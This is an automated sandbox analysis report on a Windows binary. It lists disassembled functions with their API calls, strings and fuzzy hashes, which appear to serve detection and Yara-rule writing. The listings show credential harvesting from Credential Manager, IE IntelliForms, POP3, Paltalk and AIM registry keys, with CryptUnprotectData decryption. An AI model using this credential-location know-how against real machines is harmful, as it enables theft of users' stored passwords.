                                                                                                    Function 00404109, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,7661E520), ref: 00404177
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,7661E520,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
                                                                                                    • API String ID: 2449869053-331516685
                                                                                                    • Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                                                                                    • Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
                                                                                                    • Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                                                                                    • Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040955A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409591
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004095AD
                                                                                                    • memcpy.MSVCRT ref: 004095D5
                                                                                                    • memcpy.MSVCRT ref: 004095F2
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040967B
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409685
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004096BD
                                                                                                      • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                      • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                                                                                      • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                                                                                      • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                    • String ID: $$d
                                                                                                    • API String ID: 2915808112-2066904009
                                                                                                    • Opcode ID: 6f5aac561b5649608c0d5148fdd10fc31cb827f7443ab44f776165d2fa363ad4
                                                                                                    • Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
                                                                                                    • Opcode Fuzzy Hash: 6f5aac561b5649608c0d5148fdd10fc31cb827f7443ab44f776165d2fa363ad4
                                                                                                    • Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004134D0, Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(00000000), ref: 004134D2
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
                                                                                                    • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
                                                                                                    • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041351F
                                                                                                    • CopyRect.USER32(?,?), ref: 00413533
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
                                                                                                    • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2317770421-0
                                                                                                    • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                                                                                    • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                                                                                    • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                                                                                    • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041244B, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                                                                                    • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                                                                                    • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                                                                                    • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410205, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004102AA
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,7661E520,00000000), ref: 004102C3
                                                                                                    • _strnicmp.MSVCRT ref: 004102DF
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,7661E520,00000000), ref: 0041030D
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,7661E520,00000000), ref: 0041032C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$_strnicmpmemset
                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                    • API String ID: 2393399448-3589380929
                                                                                                    • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                                                                                    • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                                                                                    • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                                                                                    • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040821A, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                                                                                      • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                      • Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478
                                                                                                    • memset.MSVCRT ref: 00408286
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
                                                                                                    • _strupr.MSVCRT ref: 004082CD
                                                                                                      • Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
                                                                                                      • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                                                                                      • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                                                                                      • Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB
                                                                                                    • memset.MSVCRT ref: 00408313
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040834F
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
                                                                                                    • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                    • API String ID: 373939914-680441574
                                                                                                    • Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                                                                                    • Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
                                                                                                    • Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                                                                                    • Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407A93, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407AB4
                                                                                                    • RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
                                                                                                    • LocalFree.KERNEL32(?), ref: 00407B67
                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                    • API String ID: 2752996003-2190619648
                                                                                                    • Opcode ID: cec00202e2846724d0b0b46026d070755af8ff0a54eef50ead682826a2db23de
                                                                                                    • Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
                                                                                                    • Opcode Fuzzy Hash: cec00202e2846724d0b0b46026d070755af8ff0a54eef50ead682826a2db23de
                                                                                                    • Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410F07, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • memset.MSVCRT ref: 00410F48
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • memset.MSVCRT ref: 00410F92
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00410FF6
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041101F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Closememset$EnumOpen
                                                                                                    • String ID: Software\Paltalk$nickname$pwd
                                                                                                    • API String ID: 1938129365-1014362899
                                                                                                    • Opcode ID: c23878bb76d00e9547f06f5eb81a13c4f10b53ad90653c278c10a550e2a960fe
                                                                                                    • Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
                                                                                                    • Opcode Fuzzy Hash: c23878bb76d00e9547f06f5eb81a13c4f10b53ad90653c278c10a550e2a960fe
                                                                                                    • Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004044DE, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                                                                                    • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                                                                                      • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94
                                                                                                    • GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00404553
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                                                                                    • String ID: DuplicateToken$SetThreadToken
                                                                                                    • API String ID: 3357505703-785560009
                                                                                                    • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                                                                                    • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                                                                                    • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                                                                                    • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408FBC, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                    • _mbscpy.MSVCRT ref: 00408FD6
                                                                                                    • _mbscpy.MSVCRT ref: 00408FE6
                                                                                                    • GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
                                                                                                    • GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                    • String ID: charset$general$rtl
                                                                                                    • API String ID: 888011440-3784062100
                                                                                                    • Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                                                                                    • Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
                                                                                                    • Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                                                                                    • Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405865, Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$strlen
                                                                                                    • String ID: '$'$S'password'$S'username'
                                                                                                    • API String ID: 3337090206-859024053
                                                                                                    • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                                                                                    • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                                                                                    • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                                                                                    • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AC28, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                                                                                    • DeleteObject.GDI32(?), ref: 0040AD3F
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040AD42
                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 3642520215-0
                                                                                                    • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                                                                                    • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                                                                                    • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                                                                                    • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D1D6, Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: account$name$password$protocol
                                                                                                    • API String ID: 1439213657-933060687
                                                                                                    • Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                                                                                    • Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
                                                                                                    • Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                                                                                    • Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B3FF, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040B41E
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040B434
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040B447
                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040B464
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040B4D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                    • String ID:
                                                                                                    • API String ID: 2126104762-0
                                                                                                    • Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                                                                                    • Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
                                                                                                    • Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                                                                                    • Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004072B5, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004072BD
                                                                                                    • strlen.MSVCRT ref: 004072CA
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 004072E6
                                                                                                    • memcpy.MSVCRT ref: 004072EF
                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 004072F8
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00407301
                                                                                                    • CloseClipboard.USER32 ref: 00407311
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2315226746-0
                                                                                                    • Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                                                                                    • Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
                                                                                                    • Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                                                                                    • Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A129, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                                                                                    • _mbscat.MSVCRT ref: 0040A1EE
                                                                                                    • sprintf.MSVCRT ref: 0040A210
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                    • Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                                                                                    • Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
                                                                                                    • Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                                                                                    • Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040876F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT ref: 004087EA
                                                                                                      • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                                                                                    • strlen.MSVCRT ref: 00408808
                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                    • memcpy.MSVCRT ref: 00408877
                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                                                                                    Strings
                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                                                                                    • strings, xrefs: 004087E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                    • API String ID: 4036804644-4125592482
                                                                                                    • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                                                                                    • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
                                                                                                    • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                                                                                    • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FD2E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,7661E520,00000000), ref: 0040FD62
                                                                                                    • RegCloseKey.ADVAPI32(?,?,7661E520,00000000), ref: 0040FE4D
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    • memcpy.MSVCRT ref: 0040FDD4
